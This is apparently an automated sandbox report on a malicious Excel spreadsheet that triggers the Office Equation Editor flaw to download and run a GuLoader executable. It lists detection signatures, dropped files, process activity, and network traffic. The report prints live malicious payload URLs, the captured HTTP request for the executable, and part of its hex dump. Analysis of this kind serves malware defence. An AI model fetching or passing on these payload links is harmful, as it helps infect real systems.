Windows Analysis Report
OR17233976_00019489_20170619154218.xlsx

Overview

General Information

Sample Name:	OR17233976_00019489_20170619154218.xlsx
Analysis ID:	623901
MD5:	06f4851cbdc105cc140818b42f000b0e
SHA1:	40ac7c31fd3e2f3524bd82200491741f02f9a1ef
SHA256:	3844f8a2b3657d0141d505373f74beb01b6c2150c6931670bc241d600dca89eb
Tags:	VelvetSweatshopxlsx
Infos:

Detection

GuLoader

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Found malware configuration

Sigma detected: EQNEDT32.EXE connecting to internet

Multi AV Scanner detection for submitted file

Sigma detected: File Dropped By EQNEDT32EXE

Antivirus detection for URL or domain

Yara detected GuLoader

Office equation editor starts processes (likely CVE 2017-11882 or CVE-2018-0802)

Shellcode detected

Office equation editor drops PE file

Tries to detect virtualization through RDTSC time measurements

C2 URLs / IPs found in malware configuration

Office equation editor establishes network connection

Drops PE files to the user root directory

May sleep (evasive loops) to hinder dynamic analysis

Contains functionality to shutdown / reboot the system

Uses code obfuscation techniques (call, push, ret)

PE file contains sections with non-standard names

Internet Provider seen in connection with other malware

Detected potential crypto function

Contains functionality to dynamically determine API calls

Found dropped PE file which has not been started or loaded

Downloads executable code via HTTP

Abnormal high CPU Usage

Potential document exploit detected (unknown TCP traffic)

PE file contains strange resources

Drops PE files

Contains functionality to read the PEB

Uses a known web browser user agent for HTTP communication

Contains functionality to download and execute PE files

Office Equation Editor has been started

Contains functionality to download and launch executables

PE file contains more sections than normal

Drops PE files to the user directory

Potential document exploit detected (performs HTTP gets)

Allocates memory within range which is reserved for system DLLs (kernel32.dll, advapi32.dll, etc)

Creates a process in suspended mode (likely to inject code)

Contains functionality for read data from the clipboard

Classification

Signatures

AV Detection

Found malware configuration

Source: 00000004.00000002.1176745536.0000000003A60000.00000040.00001000.00020000.00000000.sdmp

Malware Configuration Extractor: GuLoader {"Payload URL": "https://nordship.ru/bin_XpSIjvlBS226.bin"}

Multi AV Scanner detection for submitted file

Source: OR17233976_00019489_20170619154218.xlsx	Virustotal: Detection: 40%			Perma Link
Source: OR17233976_00019489_20170619154218.xlsx	ReversingLabs: Detection: 24%

Antivirus detection for URL or domain

Source: http://103.149.13.182/365space/.svchost.exe

Avira URL Cloud: Label: malware

Exploits

Office equation editor starts processes (likely CVE 2017-11882 or CVE-2018-0802)

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process created: C:\Users\Public\vbc.exe
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process created: C:\Users\Public\vbc.exe			Jump to behavior

Office equation editor establishes network connection

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE

Network connect: IP: 103.149.13.182 Port: 80

Jump to behavior

Office Equation Editor has been started

Source: unknown

Process created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE "C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

File opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll

Jump to behavior

Source:	Binary string: D:\SourceCode\GC3.UserExperienceImprovement\production_V4.2\Service\ServiceSDK\Release\UserExperienceImprovementPlugin\AsSQLHelper.pdb source: AsSQLHelper.dll.4.dr
Source:	Binary string: D:\SourceCode\GC3.Overclocking\production_V4.2\Service\ServiceSDK\Release\ThrottlePlugin\AEGISIIINVHelper.pdb source: AEGISIIINVHelper.dll.4.dr

Source: C:\Users\Public\vbc.exe	Code function: 4_2_00406850 FindFirstFileW,FindClose,	4_2_00406850
Source: C:\Users\Public\vbc.exe	Code function: 4_2_00405C26 GetTempPathW,DeleteFileW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose,	4_2_00405C26
Source: C:\Users\Public\vbc.exe	Code function: 4_2_0040290B FindFirstFileW,	4_2_0040290B

Software Vulnerabilities

Shellcode detected

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Code function: 2_2_03420652 ShellExecuteExW,ExitProcess,	2_2_03420652
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Code function: 2_2_0342056E LoadLibraryW,URLDownloadToFileW,ShellExecuteExW,ExitProcess,	2_2_0342056E
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Code function: 2_2_034205F1 URLDownloadToFileW,ShellExecuteExW,ExitProcess,	2_2_034205F1
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Code function: 2_2_034204C9 ExitProcess,	2_2_034204C9
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Code function: 2_2_034204E2 URLDownloadToFileW,ShellExecuteExW,ExitProcess,	2_2_034204E2
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Code function: 2_2_03420670 ExitProcess,	2_2_03420670
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Code function: 2_2_034204FE URLDownloadToFileW,ShellExecuteExW,ExitProcess,	2_2_034204FE
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Code function: 2_2_03420588 URLDownloadToFileW,ShellExecuteExW,ExitProcess,	2_2_03420588
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Code function: 2_2_0342063B ShellExecuteExW,ExitProcess,	2_2_0342063B

Potential document exploit detected (unknown TCP traffic)

Source: global traffic

TCP traffic: 192.168.2.22:49173 -> 103.149.13.182:80

Potential document exploit detected (performs HTTP gets)

Source: global traffic

TCP traffic: 192.168.2.22:49173 -> 103.149.13.182:80

Source: excel.exe

Memory has grown: Private usage: 4MB later: 84MB

Networking

C2 URLs / IPs found in malware configuration

Source: Malware configuration extractor

URLs: https://nordship.ru/bin_XpSIjvlBS226.bin

Internet Provider seen in connection with other malware

Source: Joe Sandbox View

ASN Name: VNPT-AS-VNVIETNAMPOSTSANDTELECOMMUNICATIONSGROUPVN VNPT-AS-VNVIETNAMPOSTSANDTELECOMMUNICATIONSGROUPVN

Downloads executable code via HTTP

Source: global traffic

HTTP traffic detected: HTTP/1.1 200 OKDate: Tue, 10 May 2022 20:16:58 GMTServer: Apache/2.4.47 (Win64) OpenSSL/1.1.1k PHP/7.3.28Last-Modified: Mon, 09 May 2022 21:26:38 GMTETag: "51bf8-5de9add0f38f0"Accept-Ranges: bytesContent-Length: 334840Keep-Alive: timeout=5, max=100Connection: Keep-AliveContent-Type: application/x-msdownloadData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 d8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 a8 21 60 47 ec 40 0e 14 ec 40 0e 14 ec 40 0e 14 2f 4f 51 14 ee 40 0e 14 ec 40 0f 14 49 40 0e 14 2f 4f 53 14 e3 40 0e 14 b8 63 3e 14 e0 40 0e 14 2b 46 08 14 ed 40 0e 14 52 69 63 68 ec 40 0e 14 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 05 00 68 9a 4f 61 00 00 00 00 00 00 00 00 e0 00 0f 01 0b 01 06 00 00 68 00 00 00 12 3a 00 00 08 00 00 0a 35 00 00 00 10 00 00 00 80 00 00 00 00 40 00 00 10 00 00 00 02 00 00 04 00 00 00 06 00 00 00 04 00 00 00 00 00 00 00 00 c0 3e 00 00 04 00 00 b5 2e 05 00 02 00 40 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 04 85 00 00 a0 00 00 00 00 60 3d 00 08 59 01 00 00 00 00 00 00 00 00 00 c8 fb 04 00 30 20 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 b0 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 70 66 00 00 00 10 00 00 00 68 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 9a 13 00 00 00 80 00 00 00 14 00 00 00 6c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 78 eb 39 00 00 a0 00 00 00 06 00 00 00 80 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 6e 64 61 74 61 00 00 00 d0 02 00 00 90 3a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 c0 2e 72 73 72 63 00 00 00 08 59 01 00 00 60 3d 00 00 5a 01 00 00 86 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0

Uses a known web browser user agent for HTTP communication

Source: global traffic

HTTP traffic detected: GET /365space/.svchost.exe HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: 103.149.13.182Connection: Keep-Alive

Contains functionality to download and execute PE files

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE

Code function: 2_2_0342056E LoadLibraryW,URLDownloadToFileW,ShellExecuteExW,ExitProcess,

2_2_0342056E

Source: unknown	TCP traffic detected without corresponding DNS query: 103.149.13.182
Source: unknown	TCP traffic detected without corresponding DNS query: 103.149.13.182
Source: unknown	TCP traffic detected without corresponding DNS query: 103.149.13.182
Source: unknown	TCP traffic detected without corresponding DNS query: 103.149.13.182
Source: unknown	TCP traffic detected without corresponding DNS query: 103.149.13.182
Source: unknown	TCP traffic detected without corresponding DNS query: 103.149.13.182
Source: unknown	TCP traffic detected without corresponding DNS query: 103.149.13.182
Source: unknown	TCP traffic detected without corresponding DNS query: 103.149.13.182
Source: unknown	TCP traffic detected without corresponding DNS query: 103.149.13.182
Source: unknown	TCP traffic detected without corresponding DNS query: 103.149.13.182
Source: unknown	TCP traffic detected without corresponding DNS query: 103.149.13.182
Source: unknown	TCP traffic detected without corresponding DNS query: 103.149.13.182
Source: unknown	TCP traffic detected without corresponding DNS query: 103.149.13.182
Source: unknown	TCP traffic detected without corresponding DNS query: 103.149.13.182
Source: unknown	TCP traffic detected without corresponding DNS query: 103.149.13.182
Source: unknown	TCP traffic detected without corresponding DNS query: 103.149.13.182
Source: unknown	TCP traffic detected without corresponding DNS query: 103.149.13.182
Source: unknown	TCP traffic detected without corresponding DNS query: 103.149.13.182
Source: unknown	TCP traffic detected without corresponding DNS query: 103.149.13.182
Source: unknown	TCP traffic detected without corresponding DNS query: 103.149.13.182
Source: unknown	TCP traffic detected without corresponding DNS query: 103.149.13.182
Source: unknown	TCP traffic detected without corresponding DNS query: 103.149.13.182
Source: unknown	TCP traffic detected without corresponding DNS query: 103.149.13.182
Source: unknown	TCP traffic detected without corresponding DNS query: 103.149.13.182
Source: unknown	TCP traffic detected without corresponding DNS query: 103.149.13.182
Source: unknown	TCP traffic detected without corresponding DNS query: 103.149.13.182
Source: unknown	TCP traffic detected without corresponding DNS query: 103.149.13.182
Source: unknown	TCP traffic detected without corresponding DNS query: 103.149.13.182
Source: unknown	TCP traffic detected without corresponding DNS query: 103.149.13.182
Source: unknown	TCP traffic detected without corresponding DNS query: 103.149.13.182
Source: unknown	TCP traffic detected without corresponding DNS query: 103.149.13.182
Source: unknown	TCP traffic detected without corresponding DNS query: 103.149.13.182
Source: unknown	TCP traffic detected without corresponding DNS query: 103.149.13.182
Source: unknown	TCP traffic detected without corresponding DNS query: 103.149.13.182
Source: unknown	TCP traffic detected without corresponding DNS query: 103.149.13.182
Source: unknown	TCP traffic detected without corresponding DNS query: 103.149.13.182
Source: unknown	TCP traffic detected without corresponding DNS query: 103.149.13.182
Source: unknown	TCP traffic detected without corresponding DNS query: 103.149.13.182
Source: unknown	TCP traffic detected without corresponding DNS query: 103.149.13.182
Source: unknown	TCP traffic detected without corresponding DNS query: 103.149.13.182
Source: unknown	TCP traffic detected without corresponding DNS query: 103.149.13.182
Source: unknown	TCP traffic detected without corresponding DNS query: 103.149.13.182
Source: unknown	TCP traffic detected without corresponding DNS query: 103.149.13.182
Source: unknown	TCP traffic detected without corresponding DNS query: 103.149.13.182
Source: unknown	TCP traffic detected without corresponding DNS query: 103.149.13.182
Source: unknown	TCP traffic detected without corresponding DNS query: 103.149.13.182
Source: unknown	TCP traffic detected without corresponding DNS query: 103.149.13.182
Source: unknown	TCP traffic detected without corresponding DNS query: 103.149.13.182
Source: unknown	TCP traffic detected without corresponding DNS query: 103.149.13.182
Source: unknown	TCP traffic detected without corresponding DNS query: 103.149.13.182

Source: EQNEDT32.EXE, 00000002.00000002.971735637.0000000000664000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: /moc.nideknil.wwwwww.linkedin.com equals www.linkedin.com (Linkedin)
Source: EQNEDT32.EXE, 00000002.00000002.971735637.0000000000664000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: www.linkedin.com equals www.linkedin.com (Linkedin)

Source: EQNEDT32.EXE, 00000002.00000002.971735637.0000000000664000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://103.149.13.182/365space/.svchost.exe
Source: EQNEDT32.EXE, 00000002.00000002.973889166.0000000003420000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://103.149.13.182/365space/.svchost.exej
Source: EQNEDT32.EXE, 00000002.00000002.971735637.0000000000664000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://103.149.13.182/365space/.svchost.exemmC:
Source: vbc.exe, 00000004.00000002.1176591783.0000000000788000.00000004.00000001.01000000.00000004.sdmp, wxbase30u_xml_gcc_custom.dll.4.dr, AEGISIIINVHelper.dll.4.dr, AsSQLHelper.dll.4.dr	String found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0
Source: vbc.exe, 00000004.00000002.1176591783.0000000000788000.00000004.00000001.01000000.00000004.sdmp, wxbase30u_xml_gcc_custom.dll.4.dr, AEGISIIINVHelper.dll.4.dr, AsSQLHelper.dll.4.dr	String found in binary or memory: http://cacerts.digicert.com/DigiCertSHA2AssuredIDTimestampingCA.crt0
Source: EQNEDT32.EXE, 00000002.00000002.972173687.00000000006B1000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl.globalsig
Source: .svchost[1].exe.2.dr, vbc.exe.2.dr	String found in binary or memory: http://crl.globalsign.com/ca/gstsacasha384g4.crl0
Source: AEGISIIINVHelper.dll.4.dr, AsSQLHelper.dll.4.dr	String found in binary or memory: http://crl.globalsign.com/gsextendcodesignsha2g3.crl0
Source: .svchost[1].exe.2.dr, vbc.exe.2.dr	String found in binary or memory: http://crl.globalsign.com/root-r3.crl0G
Source: AEGISIIINVHelper.dll.4.dr, AsSQLHelper.dll.4.dr	String found in binary or memory: http://crl.globalsign.com/root-r3.crl0b
Source: EQNEDT32.EXE, 00000002.00000002.972173687.00000000006B1000.00000004.00000020.00020000.00000000.sdmp, .svchost[1].exe.2.dr, vbc.exe.2.dr	String found in binary or memory: http://crl.globalsign.com/root-r6.crl0G
Source: AEGISIIINVHelper.dll.4.dr, AsSQLHelper.dll.4.dr	String found in binary or memory: http://crl.globalsign.com/root.crl0G
Source: vbc.exe, 00000004.00000002.1176591783.0000000000788000.00000004.00000001.01000000.00000004.sdmp, wxbase30u_xml_gcc_custom.dll.4.dr	String found in binary or memory: http://crl.sectigo.com/SectigoRSACodeSigningCA.crl0s
Source: vbc.exe, 00000004.00000002.1176591783.0000000000788000.00000004.00000001.01000000.00000004.sdmp, wxbase30u_xml_gcc_custom.dll.4.dr, AEGISIIINVHelper.dll.4.dr, AsSQLHelper.dll.4.dr	String found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0P
Source: vbc.exe, 00000004.00000002.1176591783.0000000000788000.00000004.00000001.01000000.00000004.sdmp, wxbase30u_xml_gcc_custom.dll.4.dr, AEGISIIINVHelper.dll.4.dr, AsSQLHelper.dll.4.dr	String found in binary or memory: http://crl3.digicert.com/sha2-assured-ts.crl02
Source: vbc.exe, 00000004.00000002.1176591783.0000000000788000.00000004.00000001.01000000.00000004.sdmp, wxbase30u_xml_gcc_custom.dll.4.dr, AEGISIIINVHelper.dll.4.dr, AsSQLHelper.dll.4.dr	String found in binary or memory: http://crl4.digicert.com/DigiCertAssuredIDRootCA.crl0:
Source: vbc.exe, 00000004.00000002.1176591783.0000000000788000.00000004.00000001.01000000.00000004.sdmp, wxbase30u_xml_gcc_custom.dll.4.dr, AEGISIIINVHelper.dll.4.dr, AsSQLHelper.dll.4.dr	String found in binary or memory: http://crl4.digicert.com/sha2-assured-ts.crl0
Source: vbc.exe, 00000004.00000002.1176591783.0000000000788000.00000004.00000001.01000000.00000004.sdmp, wxbase30u_xml_gcc_custom.dll.4.dr	String found in binary or memory: http://crt.sectigo.com/SectigoRSACodeSigningCA.crt0#
Source: vbc.exe, 00000004.00000000.969965123.000000000040A000.00000008.00000001.01000000.00000004.sdmp, vbc.exe, 00000004.00000002.1176452278.000000000040A000.00000004.00000001.01000000.00000004.sdmp, .svchost[1].exe.2.dr, vbc.exe.2.dr	String found in binary or memory: http://nsis.sf.net/NSIS_ErrorError
Source: vbc.exe, 00000004.00000002.1176591783.0000000000788000.00000004.00000001.01000000.00000004.sdmp, wxbase30u_xml_gcc_custom.dll.4.dr, AEGISIIINVHelper.dll.4.dr, AsSQLHelper.dll.4.dr	String found in binary or memory: http://ocsp.digicert.com0C
Source: vbc.exe, 00000004.00000002.1176591783.0000000000788000.00000004.00000001.01000000.00000004.sdmp, wxbase30u_xml_gcc_custom.dll.4.dr, AEGISIIINVHelper.dll.4.dr, AsSQLHelper.dll.4.dr	String found in binary or memory: http://ocsp.digicert.com0O
Source: .svchost[1].exe.2.dr, vbc.exe.2.dr	String found in binary or memory: http://ocsp.globalsign.com/ca/gstsacasha384g40C
Source: AEGISIIINVHelper.dll.4.dr, AsSQLHelper.dll.4.dr	String found in binary or memory: http://ocsp.globalsign.com/rootr103
Source: vbc.exe, 00000004.00000002.1176591783.0000000000788000.00000004.00000001.01000000.00000004.sdmp, wxbase30u_xml_gcc_custom.dll.4.dr	String found in binary or memory: http://ocsp.sectigo.com0
Source: EQNEDT32.EXE, 00000002.00000002.972173687.00000000006B1000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ocsp2.globals)
Source: AEGISIIINVHelper.dll.4.dr, AsSQLHelper.dll.4.dr	String found in binary or memory: http://ocsp2.globalsign.com/gsextendcodesignsha2g30U
Source: EQNEDT32.EXE, 00000002.00000002.972173687.00000000006B1000.00000004.00000020.00020000.00000000.sdmp, .svchost[1].exe.2.dr, AEGISIIINVHelper.dll.4.dr, vbc.exe.2.dr, AsSQLHelper.dll.4.dr	String found in binary or memory: http://ocsp2.globalsign.com/rootr306
Source: .svchost[1].exe.2.dr, vbc.exe.2.dr	String found in binary or memory: http://ocsp2.globalsign.com/rootr606
Source: AEGISIIINVHelper.dll.4.dr, AsSQLHelper.dll.4.dr	String found in binary or memory: http://secure.globalsign.com/cacert/gsextendcodesignsha2g3ocsp.crt0
Source: .svchost[1].exe.2.dr, vbc.exe.2.dr	String found in binary or memory: http://secure.globalsign.com/cacert/gstsacasha384g4.crt0
Source: vbc.exe, 00000004.00000002.1176591783.0000000000788000.00000004.00000001.01000000.00000004.sdmp, wxbase30u_xml_gcc_custom.dll.4.dr, AEGISIIINVHelper.dll.4.dr, AsSQLHelper.dll.4.dr	String found in binary or memory: http://www.digicert.com/CPS0
Source: vbc.exe, 00000004.00000002.1176591783.0000000000788000.00000004.00000001.01000000.00000004.sdmp, wxbase30u_xml_gcc_custom.dll.4.dr	String found in binary or memory: https://sectigo.com/CPS0C
Source: vbc.exe, 00000004.00000002.1176591783.0000000000788000.00000004.00000001.01000000.00000004.sdmp, wxbase30u_xml_gcc_custom.dll.4.dr, AEGISIIINVHelper.dll.4.dr, AsSQLHelper.dll.4.dr	String found in binary or memory: https://www.digicert.com/CPS0
Source: EQNEDT32.EXE, 00000002.00000002.972173687.00000000006B1000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.globalsign.9
Source: EQNEDT32.EXE, 00000002.00000002.972173687.00000000006B1000.00000004.00000020.00020000.00000000.sdmp, .svchost[1].exe.2.dr, AEGISIIINVHelper.dll.4.dr, vbc.exe.2.dr, AsSQLHelper.dll.4.dr	String found in binary or memory: https://www.globalsign.com/repository/0

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\90EF2157.emf

Jump to behavior

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE

Code function: 2_2_0342056E LoadLibraryW,URLDownloadToFileW,ShellExecuteExW,ExitProcess,

2_2_0342056E

Source: global traffic

Contains functionality for read data from the clipboard

Source: C:\Users\Public\vbc.exe

Code function: 4_2_004056BB GetDlgItem,GetDlgItem,GetDlgItem,GetDlgItem,GetClientRect,GetSystemMetrics,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,ShowWindow,ShowWindow,GetDlgItem,SendMessageW,SendMessageW,SendMessageW,GetDlgItem,CreateThread,CloseHandle,ShowWindow,ShowWindow,ShowWindow,ShowWindow,SendMessageW,CreatePopupMenu,AppendMenuW,GetWindowRect,TrackPopupMenu,SendMessageW,OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,SendMessageW,GlobalUnlock,SetClipboardData,CloseClipboard,

4_2_004056BB

System Summary

Office equation editor drops PE file

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	File created: C:\Users\Public\vbc.exe			Jump to dropped file
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\.svchost[1].exe			Jump to dropped file

Contains functionality to shutdown / reboot the system

Source: C:\Users\Public\vbc.exe

Code function: 4_2_0040350A EntryPoint,SetErrorMode,GetVersionExW,GetVersionExW,GetVersionExW,lstrlenA,#17,OleInitialize,SHGetFileInfoW,GetCommandLineW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,lstrcatW,lstrcatW,lstrcatW,lstrcmpiW,SetCurrentDirectoryW,DeleteFileW,CopyFileW,CloseHandle,OleUninitialize,ExitProcess,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,

4_2_0040350A

Detected potential crypto function

Source: C:\Users\Public\vbc.exe

Code function: 4_2_708A1BFF

4_2_708A1BFF

Abnormal high CPU Usage

Source: C:\Users\Public\vbc.exe

Process Stats: CPU usage > 98%

PE file contains strange resources

Source: .svchost[1].exe.2.dr	Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: vbc.exe.2.dr	Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST

PE file contains more sections than normal

Source: wxbase30u_xml_gcc_custom.dll.4.dr

Static PE information: Number of sections : 12 > 10

Allocates memory within range which is reserved for system DLLs (kernel32.dll, advapi32.dll, etc)

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Memory allocated: 77620000 page execute and read and write	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Memory allocated: 77740000 page execute and read and write	Jump to behavior
Source: C:\Users\Public\vbc.exe	Memory allocated: 77620000 page execute and read and write	Jump to behavior
Source: C:\Users\Public\vbc.exe	Memory allocated: 77740000 page execute and read and write	Jump to behavior

Source: OR17233976_00019489_20170619154218.xlsx	Virustotal: Detection: 40%
Source: OR17233976_00019489_20170619154218.xlsx	ReversingLabs: Detection: 24%

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: unknown	Process created: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE "C:\Program Files\Microsoft Office\Office14\EXCEL.EXE" /automation -Embedding
Source: unknown	Process created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE "C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process created: C:\Users\Public\vbc.exe "C:\Users\Public\vbc.exe"
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process created: C:\Users\Public\vbc.exe "C:\Users\Public\vbc.exe"	Jump to behavior

Source: C:\Users\Public\vbc.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{1F486A52-3CB1-48FD-8F50-B8DC300D9F9D}\InProcServer32

Jump to behavior

Source: C:\Users\Public\vbc.exe

4_2_0040350A

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

File created: C:\Users\user\Desktop\~$OR17233976_00019489_20170619154218.xlsx

Jump to behavior

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

File created: C:\Users\user\AppData\Local\Temp\CVR703F.tmp

Jump to behavior

Source: classification engine

Classification label: mal100.troj.expl.evad.winXLSX@4/26@0/1

Source: C:\Users\Public\vbc.exe

Code function: 4_2_004021AA CoCreateInstance,

4_2_004021AA

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

File read: C:\Users\desktop.ini

Jump to behavior

Source: C:\Users\Public\vbc.exe

Code function: 4_2_00404967 GetDlgItem,SetWindowTextW,SHBrowseForFolderW,CoTaskMemFree,lstrcmpiW,lstrcatW,SetDlgItemTextW,GetDiskFreeSpaceW,MulDiv,SetDlgItemTextW,

4_2_00404967

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	File read: C:\Windows\System32\drivers\etc\hosts			Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	File read: C:\Windows\System32\drivers\etc\hosts			Jump to behavior

Source: Window Recorder

Window detected: More than 3 window changes detected

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Resiliency\StartupItems

Jump to behavior

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

File opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll

Jump to behavior

Source:	Binary string: D:\SourceCode\GC3.UserExperienceImprovement\production_V4.2\Service\ServiceSDK\Release\UserExperienceImprovementPlugin\AsSQLHelper.pdb source: AsSQLHelper.dll.4.dr
Source:	Binary string: D:\SourceCode\GC3.Overclocking\production_V4.2\Service\ServiceSDK\Release\ThrottlePlugin\AEGISIIINVHelper.pdb source: AEGISIIINVHelper.dll.4.dr

Data Obfuscation

Yara detected GuLoader

Source: Yara match

File source: 00000004.00000002.1176745536.0000000003A60000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY

Uses code obfuscation techniques (call, push, ret)

Source: C:\Users\Public\vbc.exe

Code function: 4_2_708A30C0 push eax; ret

4_2_708A30EE

PE file contains sections with non-standard names

Source: wxbase30u_xml_gcc_custom.dll.4.dr

Static PE information: section name: .xdata

Contains functionality to dynamically determine API calls

Source: C:\Users\Public\vbc.exe

